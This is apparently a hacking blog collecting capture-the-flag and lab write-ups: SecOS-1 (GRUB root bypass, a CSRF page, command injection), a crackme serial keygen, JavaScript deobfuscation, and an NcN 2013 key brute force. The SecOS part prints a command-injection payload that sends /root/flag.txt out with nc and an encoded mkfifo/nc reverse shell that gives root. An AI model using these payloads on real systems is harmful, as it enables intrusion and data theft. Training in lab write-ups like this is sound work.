https://www.google.com/about/appsecurity/learning/xss/index.html
https://code.google.com/p/ratproxy/wiki/RatproxyDoc
https://code.google.com/p/skipfish/wiki/SkipfishDoc
Posted by t0n1 0 comments
Labels: , , ,

# SecOS 1 


ht# wget http://download.vulnhub.com/secos/SecOS-1.tar.gz
ht# md5sum SecOS-1.tar.gz 
e8c01ab49b98926a37f79e2ea414cfc5  SecOS-1.tar.gz
ht# tar xvzf SecOS-1.tar.gz
ht# virtualbox
<Run SecOS-1>

Grub solution

GNU GRUB
*Ubuntu
e
linux /vmlinuz-3.13.0-24-generic root=/dev/mapper/SecOS--1--vg-rot ro init=/bin/bash
F10
root@(none):/# cat /root/flag.txt | grep -m 1 flag
The flag for this first (VM) is: MickeyMustNotDie.
root@(none):/# mount -o remout,rw /
root@(none):/# passwd root
<Reboot>

CSRF solution

ht# nmap 192.168.1.1
PORT     STATE SERVICE
22/tcp   open  ssh
8081/tcp open  blackice-icecap
ht# curl --silent http://192.168.1.1:8081
---
            <!--<li><a href="/https/hacktracking.blogspot.com/hint">Wanna help?</a></li>!-->
            <li><a href="/https/hacktracking.blogspot.com/sign-up">Sign up</a></li>
            <li><a href="/https/hacktracking.blogspot.com/login">Login</a></li>
---
ht# curl --silent http://192.168.1.1:8081/hint
---
        <!--
        First: the admin visits the website (really) frequently
        Second: He runs it locally, on 127.0.0.1. 
        Third: CSRF and /(http:\/\/[-\/\.\w:0-9\?&]+)/gi, I think that's enough
        !-->
---
ht# curl --silent --request POST --data 'username=user&password=pass' http://192.168.1.1:8081/sign-up
ht# curl --silent --request POST --cookie-jar uc --cookie uc --data 'username=user&password=pass' http://192.168.1.1:8081/login
ht# curl --silent --cookie-jar uc --cookie uc http://192.168.1.1:8081/users
ht# curl --silent --request POST --cookie-jar uc --cookie uc --data 'to=spiderman&message=http://192.168.1.2:8000/csrf.html' http://192.168.1.1:8081/send-message
ht# cat csrf.html 
<html>
<body>
<form action='http://127.0.0.1:8081/change-password' method='post' name='form'>
<input name='password' value='pass'>
</form>
<script type='text/javascript'>document.form.submit();</script>
</body>
</html>
ht# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
192.168.1.1 - - "GET /csrf.html HTTP/1.1" 200 -
ht# curl --silent --request POST --cookie-jar sc --cookie sc --data 'username=spiderman&password=pass' http://192.168.1.1:8081/login
ht# curl --silent --cookie-jar sc --cookie sc http://192.168.1.1:8081/messages | grep Well
                    <td>Well, your password is.. "CrazyPassword!". So, what do you say? </td>
ht# ssh [email protected]
[email protected]'s password:CrazyPassword!
spiderman@SecOS-1:~$ crontab -e
* * * * * /opt/phantomjs/bin/phantomjs /home/spiderman/vnwa/scripts/admin.js
spiderman@SecOS-1:~$ ps axuf | grep sudo
sudo -u spiderman sh -c /usr/local/bin/node /home/spiderman/vnwa/server.js
sudo -u root sh -c /usr/local/bin/node /home/spiderman/vnwa/internalServer.js
spiderman@SecOS-1:~$ cat /home/spiderman/vnwa/internalServer.js
var fs = require('fs');
var express = require('express');
var http = require('http');
var sys = require('sys')
var exec = require('child_process').exec;
var crypto = require('crypto');

var utils = require('./lib/utils.js');
var model = require('./lib/model.js');

var app = express();
var server = http.createServer(app); 

var logger = function (req, res, next) {
    console.log(req.connection.remoteAddress + " tried to access : " + req.url);
    next(); // Passing the request to the next handler in the stack.
}

// Configuration
app.configure(function () {
    // Session management
    app.use(express.cookieParser());
    app.use(express.session({secret: 'privateKeyForSession'}));
    app.use("/js", express.static(__dirname + '/public/js')); // javascript folder
    app.use("/css", express.static(__dirname + '/public/css')); // javascript folder

    app.set('views', __dirname + '/views'); // views folder
    app.set('view engine', 'ejs'); // view engine for this projet : ejs 

    app.use(express.bodyParser()); // for POST Requests
    app.use(logger); // Here you add your logger to the stack.
    app.use(app.router); // The Express routes handler.
});


app.get('/', function (req, res) {
    res.render('ping.ejs', {
        isConnected: req.session.isConnected,
        isAdmin: req.session.isAdmin
    });
});

// Update password
app.post('/', function (req, res) {
    ip = req.body.ip
    if (ip == "") {
        utils.redirect(req, res, '/ping-status');
    } else {
        // getting the command with req.params.command
        var child;
        // console.log(req.params.command);
        child = exec('ping ' + ip, function (error, stdout, stderr) {
            res.render('ping.ejs', {
                isConnected: req.session.isConnected,
                message: stdout,
                isAdmin: req.session.isAdmin
            });
        });
    }
});

server.listen(9000, '127.0.0.1', function() {
  console.log("Listening on port 9000");
});
spiderman@SecOS-1:~$ curl --silent --request POST --data 'ip=-c 1 127.0.0.1; nc 192.168.1.2 1234 < /root/flag.txt' http://127.0.0.1:9000
ht# ncat -l 192.168.1.2 1234 | grep -m 1 flag
The flag for this first (VM) is: MickeyMustNotDie.
spiderman@SecOS-1:~$ function encode { echo -n "$1" | xxd -p | tr -d '\n' | sed 's/\(..\)/%\1/g'; }
spiderman@SecOS-1:~$ encoded=`encode '-c 1 127.0.0.1; if [ ! -p /tmp/f ]; then mkfifo /tmp/f; fi ; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.2 1234 > /tmp/f'`
spiderman@SecOS-1:~$ curl --silent --request POST --data "ip=$encoded" http://127.0.0.1:9000
ht# ncat -l 192.168.1.2 1234
# hostname
SecOS-1
# whoami
root
Posted by t0n1 0 comments
Labels: , , ,

# SecurityArtWork: Reversing challenge 


# wget --quiet http://www.securityartwork.es/wp-content/uploads/2013/11/serial.exe
# file serial.exe
serial.exe: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
- Breakpoints
004019B5  |. E8 F6FCFFFF               CALL serial.004016B0
00401776   . 83E8 0F                   SUB EAX,0F
004018FA   . 39C2                      CMP EDX,EAX
- Key function
004018D2   . 8B45 F8                   MOV EAX,DWORD PTR SS:[EBP-8]
004018D5   . 83C0 01                   ADD EAX,1
004018D8   . 8B0485 00404000           MOV EAX,DWORD PTR DS:[EAX*4+404000]
004018DF   . 8B1485 40704000           MOV EDX,DWORD PTR DS:[EAX*4+407040]
004018E6   . 8B45 F8                   MOV EAX,DWORD PTR SS:[EBP-8]
004018E9   . 83C0 02                   ADD EAX,2
004018EC   . 8B0485 00404000           MOV EAX,DWORD PTR DS:[EAX*4+404000]
004018F3   . 8B0485 40704000           MOV EAX,DWORD PTR DS:[EAX*4+407040]
004018FA   . 39C2                      CMP EDX,EAX
004018FC   . 75 0C                     JNZ SHORT serial.0040190A

# cat serial.py
#!/usr/bin/python

check = [0,4,6,0,6,0,0,5,6,3,0,5,6,9,2,5]
key = ""

for i in range(16):
        for j in range(10):
                if i*j % 10 == check[i]:
                        key += str(j)
                        break
print key
# ./serial.py
0430400527053331
# cat serials.py
#!/usr/bin/python

check = [0,4,6,0,6,0,0,5,6,3,0,5,6,9,2,5]
key = ""

def serial(key,p):
        for n in range(10):
                if p*n % 10 == check[p]:
                        if p < 15:
                                serial(key + str(n),p+1)
                        else:
                                print key + str(n)
serial("",0)

C:\> serial.exe 0430400527053331
Valid serial number :-)
Posted by t0n1 0 comments
Labels: , , , ,

# W0PR wargame 


# curl --silent --output wargame.html http://w0pr.net
# sed -n 's/.*<script>\(.*\)<\/script>.*/\1/p' wargame.html > source.js
# cat dehieroglyphy
#!/bin/bash

ifile="$1"
ofile="$ifile.decoded"

cp $ifile $ofile

function escape(){
        echo $* | sed -e "s/\[/\\\[/g" -e "s/\]/\\\]/g" -e "s/ /\\\ /g"
}

number_0='+[]'
number_1='+!![]'
number_2='!+[]+!![]'
number_3='!+[]+!![]+!![]'
number_4='!+[]+!![]+!![]+!![]'
number_5='!+[]+!![]+!![]+!![]+!![]'
number_6='!+[]+!![]+!![]+!![]+!![]+!![]'
number_7='!+[]+!![]+!![]+!![]+!![]+!![]+!![]'
number_8='!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]'
number_9='!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]'

character_0="($number_0+[])"
character_1="($number_1+[])"
character_2="($number_2+[])"
character_3="($number_3+[])"
character_4="($number_4+[])"
character_5="($number_5+[])"
character_6="($number_6+[])"
character_7="($number_7+[])"
character_8="($number_8+[])"
character_9="($number_9+[])"

_object_Object='[]+{}'
_NaN='+{}+[]'
_true='!![]+[]'
_false='![]+[]'
_undefined='[][[]]+[]'

character_blank="($_object_Object)[$number_7]"
character_leftsquarebracket="($_object_Object)[$number_0]"
character_rightsquarebracket="($_object_Object)[$character_1+$character_4]"
character_a="($_NaN)[$number_1]"
character_b="($_object_Object)[$number_2]"
character_c="($_object_Object)[$number_5]"
character_d="($_undefined)[$number_2]"
character_e="($_undefined)[$number_3]"
character_f="($_undefined)[$number_4]"
character_i="($_undefined)[$number_5]"
character_j="($_object_Object)[$number_3]"
character_l="($_false)[$number_2]"
character_n="($_undefined)[$number_1]"
character_o="($_object_Object)[$number_1]"
character_r="($_true)[$number_1]"
character_s="($_false)[$number_3]"
character_t="($_true)[$number_0]"
character_u="($_undefined)[$number_0]"
character_N="($_NaN)[$number_0]"
character_O="($_object_Object)[$number_8]"

_Infinity="+($number_1+$character_e+$character_1+$character_0+$character_0+$character_0)+[]"

character_y="($_Infinity)[$number_7]"
character_I="($_Infinity)[$number_0]"

_1e100="+($number_1+$character_e+$character_1+$character_0+$character_0)+[]"
character_plus="($_1e100)[$number_2]"

sed -i "s/`escape $character_plus`/+/g" $ofile
sed -i "s/`escape $character_I`/I/g" $ofile
sed -i "s/`escape $character_y`/y/g" $ofile
sed -i "s/`escape $character_O`/O/g" $ofile
sed -i "s/`escape $character_N`/N/g" $ofile
sed -i "s/`escape $character_u`/u/g" $ofile
sed -i "s/`escape $character_t`/t/g" $ofile
sed -i "s/`escape $character_s`/s/g" $ofile
sed -i "s/`escape $character_r`/r/g" $ofile
sed -i "s/`escape $character_o`/o/g" $ofile
sed -i "s/`escape $character_n`/n/g" $ofile
sed -i "s/`escape $character_l`/l/g" $ofile
sed -i "s/`escape $character_j`/j/g" $ofile
sed -i "s/`escape $character_i`/i/g" $ofile
sed -i "s/`escape $character_f`/f/g" $ofile
sed -i "s/`escape $character_e`/e/g" $ofile
sed -i "s/`escape $character_d`/d/g" $ofile
sed -i "s/`escape $character_c`/c/g" $ofile
sed -i "s/`escape $character_b`/b/g" $ofile
sed -i "s/`escape $character_a`/a/g" $ofile
sed -i "s/`escape $character_rightsquarebracket`/]/g" $ofile
sed -i "s/`escape $character_leftsquarebracket`/[/g" $ofile
sed -i "s/`escape $character_blank`/ /g" $ofile
sed -i "s/`escape $character_9`/9/g" $ofile
sed -i "s/`escape $character_8`/8/g" $ofile
sed -i "s/`escape $character_7`/7/g" $ofile
sed -i "s/`escape $character_6`/6/g" $ofile
sed -i "s/`escape $character_5`/5/g" $ofile
sed -i "s/`escape $character_4`/4/g" $ofile
sed -i "s/`escape $character_3`/3/g" $ofile
sed -i "s/`escape $character_2`/2/g" $ofile
sed -i "s/`escape $character_1`/1/g" $ofile
sed -i "s/`escape $character_0`/0/g" $ofile
sed -i "s/`escape $number_9`/9/g" $ofile
sed -i "s/`escape $number_8`/8/g" $ofile
sed -i "s/`escape $number_7`/7/g" $ofile
sed -i "s/`escape $number_6`/6/g" $ofile
sed -i "s/`escape $number_5`/5/g" $ofile
sed -i "s/`escape $number_4`/4/g" $ofile
sed -i "s/`escape $number_3`/3/g" $ofile
sed -i "s/`escape $number_2`/2/g" $ofile
sed -i "s/`escape $number_1`/1/g" $ofile

functionConstructor="[][s+o+r+t][c+o+n+s+t+r+u+c+t+o+r]"
returnLocation="([]+$functionConstructor(r+e+t+u+r+n+ +l+o+c+a+t+i+o+n)())"
character_h="$returnLocation[0]"
character_p="$returnLocation[3]"
character_slash="$returnLocation[6]"

sed -i "s/`escape $character_h`/h/g" $ofile
sed -i "s/`escape $character_p`/p/g" $ofile
sed -i "s/`escape $character_slash`/\//g" $ofile

_unescape="$functionConstructor(r+e+t+u+r+n+ +u+n+e+s+c+a+p+e)()"
_escape="$functionConstructor(r+e+t+u+r+n+ +e+s+c+a+p+e)()"

character_percentage="$_escape([)[+[]]"
sed -i "s/`escape $character_percentage`/%/g" $ofile

for i in {2..7}; do
        for j in {0..9} {a..e}; do
                char=`printf "\x$i$j\n"`
                if [ "$char" == '\' ]; then char='\\'; fi
                match="$_unescape(%+$i+$j)"
                sed -i "s/`escape $match`/$char/g" $ofile
        done
done

sed -i "s/`escape $functionConstructor`/Function/" $ofile
sed -i "s/+//g" $ofile

cat $ofile
# ./dehieroglyphy source.js
Function(setInterval(function(){var a = document.getElementById('blinking');if (a.style.display == 'none') a.style.display = 'inline';else a.style.display = 'none';}, 500 );)()
References

https://github.com/alcuadrado/hieroglyphy/blob/master/hieroglyphy.js
Posted by t0n1 0 comments
Labels: , , , , ,

# NcN CTF Quals 2k13


Access Level 1

# curl http://ctf.noconname.org/4cbe48a830c4cd2d4ac9e6e9373e3055/index.html
<!DOCTYPE html>
<html>
  <head>
    <title>NcN 2013 Registration Quals</title>
                <link rel="stylesheet" href="../res/main.css" type="text/css" media="screen"/>
    <link href='../res/UbuntuMono.css' rel='stylesheet' type='text/css'>
    <meta content="Javier Marcos @javutin" name="author" />
        <script type="text/javascript" src="crypto.js"></script>
        </head>
<body>
        <div id="level">
        <center>
                <h2 style="color: white">Discover the buried valid key:</h2>
    <form action="login.php" method="POST" onsubmit="return encrypt(this);">
    <table border=0 align="center">
     <tr>
        <td><label style="color: white" for="key"><b>Key: </b></label></td>
        <td><input type="text" name="password" id="password" class="input"></td>
                                        <input type="hidden" name="key" id="key" value="">
                                        <input type="hidden" name="verification" id="verification" value="yes">
     </tr>
     <tr>
        <td colspan="2" align="center"><p><input type="submit" name="send" class="button" value="Send"></p></td>
     </tr>
    </table>
    </form>
        </center>
        </div>
</body>
</html>
# curl --silent http://ctf.noconname.org/4cbe48a830c4cd2d4ac9e6e9373e3055/crypto.js | sed 's/eval/console.log/'
var _0x52ae=["\x66\x20\x6F\x28\x38\x29\x7B\x63\x20\x69\x2C\x6A\x3D\x30\x3B\x6B\x28\x69\x3D\x30\x3B\x69\x3C\x38\x2E\x6C\x3B\x69\x2B\x2B\x29\x7B\x6A\x2B\x3D\x28\x38\x5B\x69\x5D\x2E\x73\x28\x29\x2A\x28\x69\x2B\x31\x29\x29\x7D\x67\x20\x74\x2E\x75\x28\x6A\x29\x25\x76\x7D\x66\x20\x70\x28\x68\x29\x7B\x68\x3D\x68\x2E\x71\x28\x30\x29\x3B\x63\x20\x69\x3B\x6B\x28\x69\x3D\x30\x3B\x69\x3C\x77\x3B\x2B\x2B\x69\x29\x7B\x63\x20\x35\x3D\x69\x2E\x78\x28\x79\x29\x3B\x6D\x28\x35\x2E\x6C\x3D\x3D\x31\x29\x35\x3D\x22\x30\x22\x2B\x35\x3B\x35\x3D\x22\x25\x22\x2B\x35\x3B\x35\x3D\x7A\x28\x35\x29\x3B\x6D\x28\x35\x3D\x3D\x68\x29\x41\x7D\x67\x20\x69\x7D\x66\x20\x6E\x28\x38\x29\x7B\x63\x20\x69\x2C\x61\x3D\x30\x2C\x62\x3B\x6B\x28\x69\x3D\x30\x3B\x69\x3C\x38\x2E\x6C\x3B\x2B\x2B\x69\x29\x7B\x62\x3D\x70\x28\x38\x2E\x71\x28\x69\x29\x29\x3B\x61\x2B\x3D\x62\x2A\x28\x69\x2B\x31\x29\x7D\x67\x20\x61\x7D\x66\x20\x42\x28\x39\x29\x7B\x63\x20\x32\x3B\x32\x3D\x6E\x28\x39\x2E\x64\x2E\x65\x29\x3B\x32\x3D\x32\x2A\x28\x33\x2B\x31\x2B\x33\x2B\x33\x2B\x37\x29\x3B\x32\x3D\x32\x3E\x3E\x3E\x36\x3B\x32\x3D\x32\x2F\x34\x3B\x32\x3D\x32\x5E\x43\x3B\x6D\x28\x32\x21\x3D\x30\x29\x7B\x72\x28\x27\x44\x20\x64\x21\x27\x29\x7D\x45\x7B\x72\x28\x27\x46\x20\x64\x20\x3A\x29\x27\x29\x7D\x39\x2E\x47\x2E\x65\x3D\x6E\x28\x39\x2E\x64\x2E\x65\x29\x3B\x39\x2E\x48\x2E\x65\x3D\x22\x49\x22\x2B\x6F\x28\x39\x2E\x64\x2E\x65\x29\x3B\x67\x20\x4A\x7D","\x7C","\x73\x70\x6C\x69\x74","\x7C\x7C\x72\x65\x73\x7C\x7C\x7C\x68\x65\x78\x5F\x69\x7C\x7C\x7C\x73\x74\x72\x7C\x66\x6F\x72\x6D\x7C\x7C\x7C\x76\x61\x72\x7C\x70\x61\x73\x73\x77\x6F\x72\x64\x7C\x76\x61\x6C\x75\x65\x7C\x66\x75\x6E\x63\x74\x69\x6F\x6E\x7C\x72\x65\x74\x75\x72\x6E\x7C\x66\x6F\x6F\x7C\x7C\x68\x61\x73\x68\x7C\x66\x6F\x72\x7C\x6C\x65\x6E\x67\x74\x68\x7C\x69\x66\x7C\x6E\x75\x6D\x65\x72\x69\x63\x61\x6C\x5F\x76\x61\x6C\x75\x65\x7C\x73\x69\x6D\x70\x6C\x65\x48\x61\x73\x68\x7C\x61\x73\x63\x69\x69\x5F\x6F\x6E\x65\x7C\x63\x68\x61\x72\x41\x74\x7C\x61\x6C\x65\x72\x74\x7C\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74\x7C\x4D\x61\x74\x68\x7C\x61\x62\x73\x7C\x33\x31\x33\x33\x37\x7C\x32\x35\x36\x7C\x74\x6F\x53\x74\x72\x69\x6E\x67\x7C\x31\x36\x7C\x75\x6E\x65\x73\x63\x61\x70\x65\x7C\x62\x72\x65\x61\x6B\x7C\x65\x6E\x63\x72\x79\x70\x74\x7C\x34\x31\x35\x33\x7C\x49\x6E\x76\x61\x6C\x69\x64\x7C\x65\x6C\x73\x65\x7C\x43\x6F\x72\x72\x65\x63\x74\x7C\x6B\x65\x79\x7C\x76\x65\x72\x69\x66\x69\x63\x61\x74\x69\x6F\x6E\x7C\x79\x65\x73\x7C\x74\x72\x75\x65","","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x72\x65\x70\x6C\x61\x63\x65","\x5C\x77\x2B","\x5C\x62","\x67"];console.log(function (_0x7038x1,_0x7038x2,_0x7038x3,_0x7038x4,_0x7038x5,_0x7038x6){_0x7038x5=function (_0x7038x3){return (_0x7038x3<_0x7038x2?_0x52ae[4]:_0x7038x5(parseInt(_0x7038x3/_0x7038x2)))+((_0x7038x3=_0x7038x3%_0x7038x2)>35?String[_0x52ae[5]](_0x7038x3+29):_0x7038x3.toString(36));} ;if(!_0x52ae[4][_0x52ae[6]](/^/,String)){while(_0x7038x3--){_0x7038x6[_0x7038x5(_0x7038x3)]=_0x7038x4[_0x7038x3]||_0x7038x5(_0x7038x3);} ;_0x7038x4=[function (_0x7038x5){return _0x7038x6[_0x7038x5];} ];_0x7038x5=function (){return _0x52ae[7];} ;_0x7038x3=1;} ;while(_0x7038x3--){if(_0x7038x4[_0x7038x3]){_0x7038x1=_0x7038x1[_0x52ae[6]]( new RegExp(_0x52ae[8]+_0x7038x5(_0x7038x3)+_0x52ae[8],_0x52ae[9]),_0x7038x4[_0x7038x3]);} ;} ;return _0x7038x1;} (_0x52ae[0],46,46,_0x52ae[3][_0x52ae[2]](_0x52ae[1]),0,{}));
# node
> var _0x52ae=["\x66\x20\x6F\x28\x38\x29\x7B\x63\x20\x69\x2C\x6A\x3D\x30\x3B\x6B\x28\x69\x3D\x30\x3B\x69\x3C\x38\x2E\x6C\x3B\x69\x2B\x2B\x29\x7B\x6A\x2B\x3D\x28\x38\x5B\x69\x5D\x2E\x73\x28\x29\x2A\x28\x69\x2B\x31\x29\x29\x7D\x67\x20\x74\x2E\x75\x28\x6A\x29\x25\x76\x7D\x66\x20\x70\x28\x68\x29\x7B\x68\x3D\x68\x2E\x71\x28\x30\x29\x3B\x63\x20\x69\x3B\x6B\x28\x69\x3D\x30\x3B\x69\x3C\x77\x3B\x2B\x2B\x69\x29\x7B\x63\x20\x35\x3D\x69\x2E\x78\x28\x79\x29\x3B\x6D\x28\x35\x2E\x6C\x3D\x3D\x31\x29\x35\x3D\x22\x30\x22\x2B\x35\x3B\x35\x3D\x22\x25\x22\x2B\x35\x3B\x35\x3D\x7A\x28\x35\x29\x3B\x6D\x28\x35\x3D\x3D\x68\x29\x41\x7D\x67\x20\x69\x7D\x66\x20\x6E\x28\x38\x29\x7B\x63\x20\x69\x2C\x61\x3D\x30\x2C\x62\x3B\x6B\x28\x69\x3D\x30\x3B\x69\x3C\x38\x2E\x6C\x3B\x2B\x2B\x69\x29\x7B\x62\x3D\x70\x28\x38\x2E\x71\x28\x69\x29\x29\x3B\x61\x2B\x3D\x62\x2A\x28\x69\x2B\x31\x29\x7D\x67\x20\x61\x7D\x66\x20\x42\x28\x39\x29\x7B\x63\x20\x32\x3B\x32\x3D\x6E\x28\x39\x2E\x64\x2E\x65\x29\x3B\x32\x3D\x32\x2A\x28\x33\x2B\x31\x2B\x33\x2B\x33\x2B\x37\x29\x3B\x32\x3D\x32\x3E\x3E\x3E\x36\x3B\x32\x3D\x32\x2F\x34\x3B\x32\x3D\x32\x5E\x43\x3B\x6D\x28\x32\x21\x3D\x30\x29\x7B\x72\x28\x27\x44\x20\x64\x21\x27\x29\x7D\x45\x7B\x72\x28\x27\x46\x20\x64\x20\x3A\x29\x27\x29\x7D\x39\x2E\x47\x2E\x65\x3D\x6E\x28\x39\x2E\x64\x2E\x65\x29\x3B\x39\x2E\x48\x2E\x65\x3D\x22\x49\x22\x2B\x6F\x28\x39\x2E\x64\x2E\x65\x29\x3B\x67\x20\x4A\x7D","\x7C","\x73\x70\x6C\x69\x74","\x7C\x7C\x72\x65\x73\x7C\x7C\x7C\x68\x65\x78\x5F\x69\x7C\x7C\x7C\x73\x74\x72\x7C\x66\x6F\x72\x6D\x7C\x7C\x7C\x76\x61\x72\x7C\x70\x61\x73\x73\x77\x6F\x72\x64\x7C\x76\x61\x6C\x75\x65\x7C\x66\x75\x6E\x63\x74\x69\x6F\x6E\x7C\x72\x65\x74\x75\x72\x6E\x7C\x66\x6F\x6F\x7C\x7C\x68\x61\x73\x68\x7C\x66\x6F\x72\x7C\x6C\x65\x6E\x67\x74\x68\x7C\x69\x66\x7C\x6E\x75\x6D\x65\x72\x69\x63\x61\x6C\x5F\x76\x61\x6C\x75\x65\x7C\x73\x69\x6D\x70\x6C\x65\x48\x61\x73\x68\x7C\x61\x73\x63\x69\x69\x5F\x6F\x6E\x65\x7C\x63\x68\x61\x72\x41\x74\x7C\x61\x6C\x65\x72\x74\x7C\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74\x7C\x4D\x61\x74\x68\x7C\x61\x62\x73\x7C\x33\x31\x33\x33\x37\x7C\x32\x35\x36\x7C\x74\x6F\x53\x74\x72\x69\x6E\x67\x7C\x31\x36\x7C\x75\x6E\x65\x73\x63\x61\x70\x65\x7C\x62\x72\x65\x61\x6B\x7C\x65\x6E\x63\x72\x79\x70\x74\x7C\x34\x31\x35\x33\x7C\x49\x6E\x76\x61\x6C\x69\x64\x7C\x65\x6C\x73\x65\x7C\x43\x6F\x72\x72\x65\x63\x74\x7C\x6B\x65\x79\x7C\x76\x65\x72\x69\x66\x69\x63\x61\x74\x69\x6F\x6E\x7C\x79\x65\x73\x7C\x74\x72\x75\x65","","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x72\x65\x70\x6C\x61\x63\x65","\x5C\x77\x2B","\x5C\x62","\x67"];console.log(function (_0x7038x1,_0x7038x2,_0x7038x3,_0x7038x4,_0x7038x5,_0x7038x6){_0x7038x5=function (_0x7038x3){return (_0x7038x3<_0x7038x2?_0x52ae[4]:_0x7038x5(parseInt(_0x7038x3/_0x7038x2)))+((_0x7038x3=_0x7038x3%_0x7038x2)>35?String[_0x52ae[5]](_0x7038x3+29):_0x7038x3.toString(36));} ;if(!_0x52ae[4][_0x52ae[6]](/^/,String)){while(_0x7038x3--){_0x7038x6[_0x7038x5(_0x7038x3)]=_0x7038x4[_0x7038x3]||_0x7038x5(_0x7038x3);} ;_0x7038x4=[function (_0x7038x5){return _0x7038x6[_0x7038x5];} ];_0x7038x5=function (){return _0x52ae[7];} ;_0x7038x3=1;} ;while(_0x7038x3--){if(_0x7038x4[_0x7038x3]){_0x7038x1=_0x7038x1[_0x52ae[6]]( new RegExp(_0x52ae[8]+_0x7038x5(_0x7038x3)+_0x52ae[8],_0x52ae[9]),_0x7038x4[_0x7038x3]);} ;} ;return _0x7038x1;} (_0x52ae[0],46,46,_0x52ae[3][_0x52ae[2]](_0x52ae[1]),0,{}));
function simpleHash(str){var i,hash=0;for(i=0;i<str.length;i++){hash+=(str[i].charCodeAt()*(i+1))}return Math.abs(hash)%31337}function ascii_one(foo){foo=foo.charAt(0);var i;for(i=0;i<256;++i){var hex_i=i.toString(16);if(hex_i.length==1)hex_i="0"+hex_i;hex_i="%"+hex_i;hex_i=unescape(hex_i);if(hex_i==foo)break}return i}function numerical_value(str){var i,a=0,b;for(i=0;i<str.length;++i){b=ascii_one(str.charAt(i));a+=b*(i+1)}return a}function encrypt(form){var res;res=numerical_value(form.password.value);res=res*(3+1+3+3+7);res=res>>>6;res=res/4;res=res^4153;if(res!=0){alert('Invalid password!')}else{alert('Correct password :)')}form.key.value=numerical_value(form.password.value);form.verification.value="yes"+simpleHash(form.password.value);return true}
> function simpleHash(str){
...      var i,hash=0;
...      for(i=0;i<str.length;i++){
.....           hash+=(str[i].charCodeAt()*(i+1))
.....      }
...      return Math.abs(hash)%31337
... }
> function ascii_one(foo) {
...     foo = foo.charAt(0);
...     var i;
...     for (i = 0; i < 256; ++i) {
.....         var hex_i = i.toString(16);
.....         if (hex_i.length == 1) hex_i = "0" + hex_i;
.....         hex_i = "%" + hex_i;
.....         hex_i = unescape(hex_i);
.....         if (hex_i == foo) break
.....     }
...     return i
... }
> function numerical_value(str) {
...     var i, a = 0, b;
...     for (i = 0; i < str.length; ++i) {
.....         b = ascii_one(str.charAt(i));
.....         a += b * (i + 1)
.....     }
...     return a
... }
> function encrypt(form) {
...     var res;
...     res = numerical_value(form.password.value);
...     res = res * (3 + 1 + 3 + 3 + 7);
...     res = res >>> 6;
...     res = res / 4;
...     res = res ^ 4153;
...     if (res != 0) {
.....         alert('Invalid password!')
.....     } else {
.....         alert('Correct password :)')
...     }
...     form.key.value = numerical_value(form.password.value);
...     form.verification.value = "yes" + simpleHash(form.password.value);
...     return true
... }
> var max=700000; var total=0; for (var i = 0; i < max; ++i) { total=(((i*17)>>>6)/4)^4153; if(total==0){console.log(i);}; };
62540
62541
62542
62543
62544
62545
62546
62547
62548
62549
62550
62551
62552
62553
62554
> function init(dec,len){
...  var deckey=new Array();
...  for(var i=1; i<=len; i++){ deckey[i]=dec; }
...  return deckey;
... }
> function add(deckey,len){
...  var counter=0;
...  for(var i=1; i<=len; i++){ counter+=deckey[i]*i; }
...  return counter;
... }
> var len, dist, deckey, count, key;
> len=100;
> for(var dec=32; dec<=126; dec++){
...  dist=126-dec;
...  for(var i=1; i<=len; i++){
.....   deckey=init(dec,i);
.....   count=add(deckey,i);
.....   diff=62540-count;
.....   if((0<=diff)&&(diff<=dist)){
.......    key=String.fromCharCode(dec+diff);
.......    char=String.fromCharCode(dec);
.......    for(var j=1; j<=i-1; j++){
.........     key+=char;
.........    }
.......    console.log("key = '"+key+"'");
.......   }
.....  }
... }
key = 'L                                                             '
key = 'r1111111111111111111111111111111111111111111111111'
key = 't333333333333333333333333333333333333333333333333'
> simpleHash('r1111111111111111111111111111111111111111111111111');
31203
# curl --silent --request POST --data 'password=r1111111111111111111111111111111111111111111111111&key=62540&verification=yes31203' http://ctf.noconname.org/4cbe48a830c4cd2d4ac9e6e9373e3055/login.php
<!DOCTYPE html>
<html>
  <head>
    <title>NcN 2013 Registration Quals</title>
 </head>
<body>
<b>Congrats! you passed the level! Here is the key: 23f8d1cea8d60c5816700892284809a94bd00fe7347645b96a99559749c7b7b8</b></body>
</html>

# cat level_1.c
#include <stdio.h>
#include <stdlib.h>

int level1(int *key,int partial,int pos,int max,int len){
        int i,j,total;
        if(pos==1){
                for(i=126;i>=32;i--){
                        total=partial+i;
                        if((max<=total)&&(total<=max+14)){
                                key[pos-1]=i;
                                printf("key '\t");
                                for(j=0;j<len;j++){ printf("%c",key[j]); }
                                printf("'\t%d <= (%d) <= %d\n",max,total,max+14);

                        }
                }
        }else{
                for(i=126;i>=32;i--){
                        total=partial+pos*i;
                        if(total<=max){
                                key[pos-1]=i;
                                level1(key,total,pos-1,max,len);
                        }
                }
        }
}
int main(int argc, char *argv[]){
        int *key,len,i,j,total,max;
        max=atoi(argv[1]);
        len=atoi(argv[2]);
        for(i=0;i<len;i++){
                total=0;
                for(j=0;j<=i;j++){ total+=126*(j+1); }
                if(max<=total){
                        key=malloc(sizeof(int)*i+1);
                        printf("Trying key length = %d, total = %d and >= %d\n",i+1,total,max);
